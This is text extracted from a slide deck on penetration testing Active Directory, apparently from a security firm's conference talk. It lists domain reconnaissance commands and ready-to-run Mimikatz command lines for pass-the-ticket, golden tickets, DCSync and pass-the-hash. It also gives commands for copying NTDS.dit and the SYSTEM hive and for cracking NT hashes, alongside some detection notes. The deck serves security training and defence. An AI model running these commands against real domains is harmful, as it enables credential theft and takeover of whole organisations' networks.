systeminfo > info_output.txt Displays detailed configuration information about a computer and its
operating system, including operating system configuration, security
information, product ID, and hardware properties, such as RAM, disk space,
and network cards
schtasks /query /fo LIST /v list of scheduled tasks: whether they are recurring, where the task can be
found and its parameters, as well as, crucially, what permissions they are run
with
dir, type, findstr Browse and search for information in the local file system.
32Pentesting Active Directory
33. ciyinet
NETWORK RECONNAISSANCE
Command Description
ping ☺
echo %USERDOMAIN% Domain name which the host is joined to
echo %logonserver% Obtains the name of the Domain Controller the host used to
authenticate toset logonserver
net group /domain Lists existing groups in the domain
net group <GROUP NAME>/domain Lists members of a group.
I.e: “domain computers”, “domain controllers”, “domain admins”
net localgroup administrators /domain Gets members of the built-in group “Administrators”
Collect information of the network, process and OS in order to
investigate what kind of machine we succeeded in infecting
33Pentesting Active Directory
34. ciyinet
NETWORK RECONNAISSANCE
Command Description
net user /domain Lists all users within the domaindominio actual
net user <ACCOUNT NAME> /domain Obtains detailed information about a user given his username
net view Displays a list of domains, computers, or resources that are being
shared by the specified computer. Used without parameters, net
view displays a list of computers in your current domain
net use Access to shared resources
net accounts /domain Obtains the domain password policy
nltest /domain_trusts Maps trust relationships
Collect information of the network, process and OS in order to
investigate what kind of machine we succeeded in infecting
34Pentesting Active Directory
37. ciyinet 37
COMMON ATTACKS & TECHNIQUES
• Passwords in SYSVOL & Group Policy Preferences – 10%
• Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5%
• Kerberos TGS Service Ticket Cracking (Kerberoast) – 20%
• SMB Shares Mining – 75%
• Credential Theft Shuffle (“Mimikatz dance”) – 60%
Reference:
https://adsecurity.org/?p=2362
Pentesting Active Directory
38. ciyinet 38
COMMON ATTACKS & TECHNIQUES
• Passwords in SYSVOL & Group Policy Preferences – 10%
• Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5%
• Kerberos TGS Service Ticket Cracking (Kerberoast) – 20%
• SMB Shares Mining – 75%
• Credential Theft Shuffle (“Mimikatz dance”) – 60%
Reference:
https://adsecurity.org/?p=2362
Pentesting Active Directory
39. ciyinet 39
KERBEROAST
Pentesting Active Directory
1. Client encrypts a
timestamp with his/her
hash/key
2. Client receives a TGT
signed with the domain
krbtgt account that
proves they are who
they say they are
3. The TGT is then used
to request service
tickets (TGS) for specific
resources/services on
the domain.
4. DC sends a TGS
ticket encrypted using
the hash of the
account that is
associated with that
service (SPN)
Attacker
40. ciyinet 40
KERBEROAST
• Offline brute force of password of service account within service tickets (TGS)
• No risk of detection
• No account lockouts
• Invoke-Kerberoast from PowerView (dev) to collect hashes
• Focus on user accounts. They have shorter passwords
• JohnTheRipper (magnumripper) to crack them
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/magnumripper/JohnTheRipper
Pentesting Active Directory
41. ciyinet 41
SMB SHARES MINING
• Usually very fruitful, but sometimes boring and time consuming
• Enumerating shares in the environment and looking for data with hardcoded creds
(scripts, config files), backups, documentation…
PowerView Find-ShareDomain
• Searches for computer shares on the domain. If -CheckShareAccess is passed, then only
shares the current user has read access to are returned.
smbmap
• Intended to simplify searching for potentially sensitive data across large networks.
• Enumerates samba share drives across an entire domain. List drives, permissions, contents,
upload/download functionality, file name auto-download pattern matching, etc.
Reference:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/ShawnDEvans/smbmap
Pentesting Active Directory
43. ciyinet 43
CREDENTIAL THEFT SHUFFLE
• Escalating privileges on some machine
• Extracting creds/hashes from memory
• Derivative administrator
• User hunting: moving laterally and repeating the attack till Domain
Admin level is reached
References:
https://github.com/gentilkiwi/mimikatz
Pentesting Active Directory
“Mimikatz dance”
47. ciyinet 47
USER HUNTING
• Invoke-UserHunter (PowerView)
• BloodHound
1. Gets groups and group members of each group
2. Lists domain computers
3. Obtains local admins for each computer
4. Lists active sessions on each computer
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/BloodHoundAD/BloodHound
Pentesting Active Directory
56. ciyinetPentesting Active Directory 56
PASS-THE-TICKET
• Inject Kerberos tickets
• Tickets must be in Kerberos credential format (KRB_CRED) -
http://tools.ietf.org/html/rfc4120#section-5.8
• Kerberos module does not require any privilege. It uses official
Microsoft Kerberos API
mimikatz.exe "kerberos::ptt FILENAME"
57. ciyinet 57
GOLDEN TICKET Encrypted with KRBTGT hash
Attacker
TGT:
• Username
• Groups
membership
• …
krbtgt:hash
Pentesting Active Directory
58. ciyinet 58
GOLDEN TICKET
KRBTGT hash can be used to generate arbitrary TGT:
• Made by the attacker, not KDC
• Anything can be pushed inside
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH
/user:USERNAME /id:ID /groups:500,501,513,512,520,518,519 /ptt"
Pentesting Active Directory
60. ciyinet 60
DCSYNC
• It “impersonates” a Domain Controller and requests account
password data from the targeted Domain Controller
• Replicates the user credentials via GetNCChanges (Directory
Replication Service (DRS) Remote Protocol)
• Special rights are required to run DCSync
mimikatz.exe "lsadump::dcsync /dc:DC /domain:DOMAIN /user:USERNAME" exit
mimikatz.exe "lsadump::dcsync /all /csv" exit
Pentesting Active Directory
62. ciyinetPentesting Active Directory 62
DCSHADOW
Register new domain controllers to inject malicious AD objects
and so create backdoors or any kind of illegitimate access or
right
Reference:
https://blog.alsid.eu/dcshadow-explained-4510f52fc19d
Hi guys! This is
DCShadow!
68. ciyinet
NTDS.DIT
How-to get hashes from it:
1. Decrypt Password Encryption Key (PEK). PEK is encrypted using
bootkey
2. Hashes decryption first round with PEK using RC4
3. Hashes decryption second round with DES
68Pentesting Active Directory
69. ciyinet 69
GRAB NTDS.DIT AND SYSTEM
Volume Shadow Copy
Ntdsutil
Invoke-NinjaCopy
Invoke-NinjaCopy –Path “C:WindowsNTDSntds.dit” –LocalDestination
“C:ntds.dit”
Invoke-NinjaCopy –Path “C:WindowsSystem32configSYSTEM” –LocalDestination
“C:SYSTEM”
ntdsutil "ac i ntds" "ifm" "create full c:copy-ntds" quit quit
vssadmin create shadow /for=C:
Pentesting Active Directory
72. ciyinet
John the Ripper
Hashcat & Rockyou wordlist
72
CRACKING NT HASHES
john FILE_HASHES --format=NT
hashcat -a 0 -m 1000 --username FILE_HASHES /usr/share/wordlists/rockyou.txt
--potfile-path OUTPUT_NT.pot
Pentesting Active Directory
77. ciyinet 77
PASS-THE-HASH
Pentesting Active Directory
• Based on local Security events
• Not capture by ATA by default
• Force NTLM to be used
• Overpass-the-hash: Encryption downgrade is detected
mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME
/ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM " exit
78. ciyinet 78
PASS-THE-HASH
Pentesting Active Directory
• Based on local Security events
• Not capture by ATA by default
• Force NTLM to be used
• Overpass-the-hash: Encryption downgrade is detected
mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME
/ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM " exit
80. ciyinet 80
GOLDEN TICKET
• Same as overpass-the-hash
• Detection based on lifetime
• Default ticket lifetime in AD is 10 hours
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH
/aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600
/renewmax:10080 /user:USERNAME /ptt"
Pentesting Active Directory
81. ciyinet 81
GOLDEN TICKET
• Same as overpass-the-hash
• Detection based on lifetime
• Default ticket lifetime in AD is 10 hours
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH
/aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600
/renewmax:10080 /user:USERNAME /ptt"
Pentesting Active Directory
82. ciyinet 82
GOLDEN TICKET
• Same as overpass-the-hash
• Detection based on lifetime
• Default ticket lifetime in AD is 10 hours
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH
/aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600
/renewmax:10080 /user:USERNAME /ptt"
Pentesting Active Directory
83. ciyinet 83
DCSYNC
DRS traffic (DSGetNCChanges) from a non-DC to a DC system
can be detected
Pentesting Active Directory
84. ciyinet 84
DCSYNC
DRS traffic (DSGetNCChanges) from a non-DC to a DC system
can be detected
Microsoft ATA Attacker
Pentesting Active Directory
93. ciyinet 93
BUSINESS RISK
Compromise of just one Domain Admin account in the Active Directory
exposes the entire organization to risk. The attacker would have unrestricted
access to all resources managed by the domain, all users, servers,
workstations and data.
Moreover, the attacker could instantly establish persistence in the Active
Directory environment, which is difficult to notice and cannot be efficiently
remediated with guarantees.
“Once domain admin, always domain admin”
Pentesting Active Directory
94. ciyinet 94
ACKNOWLEDGMENT & REFERENCES
• Miroslav Sotak and TVM team
• FWHIBBIT
• RootedCON and any other Sec Community in Spain
Pentesting Active Directory